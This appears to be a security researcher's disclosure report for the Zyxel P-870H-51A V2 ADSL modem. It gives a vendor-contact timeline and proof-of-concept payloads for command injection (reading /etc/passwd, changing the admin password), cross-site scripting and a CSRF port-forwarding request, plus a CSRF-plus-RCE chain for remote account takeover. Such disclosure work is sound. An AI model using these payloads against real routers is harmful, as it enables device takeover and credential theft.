Vulnerability report: Zyxel P-870H-51A V2

1 minute read
January 11, 2015

This is a vulnerability report for Zyxe lP-870H-51A V2 ADSL2 modem (multiple vulnerabilities).

Technical specifications

  • Product: Zyxel P-870H-51A V2
  • Firmware: 1.01(AWZ.4)
  • Vulnerability type: cross-site request forgery, cross-site scripting, command injection

Disclosure timeline

  • 6th May 2014 - Contacted vendor (never received reply)
  • 28th May 2014 - Contacted NSCS-FI
  • 11th August 2014 - Received reply from NSCS-FI. They had contacted vendor. The vendor had replied, that the product is no longer supported - asked to make sure that the firmware was updated.
  • 12th January 2015 - Public disclosure

Remote Command Execution

Requires that the user is logged in. Output is shown. Can be exploited remotely as CSRF vulnerability (however, the attacker does not receive the output).;%20cat%20/etc/passwd&diagTestType=1

Since the default shell of the Linux distribution is very limited, it may be handy to run commands via sh:;%20sh%20-c%20ifconfig%20-a&diagTestType=1

Cross-site scripting';alert('xss');//&diagTestType=1

Cross-site request forgery

Can do many actions, such as add port forwarding rules to internal network. Just redirect the victim to following URL:,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,

Requests that trigger “change password” and “reboot” require sessionKey-parameter and thus cannot be forged. Wait, let’s see again. The device contains a non-standard Unix passwd command - which does not require the “current” password:

 > passwd

Usage: passwd <supervisor|admin|user> <password>
 passwd --help

Hence, by combining this CSRF vulnerability and RCE, the attacker can remotely change the admin password:;%20passwd%20admin%20newpasswd

Leave a Comment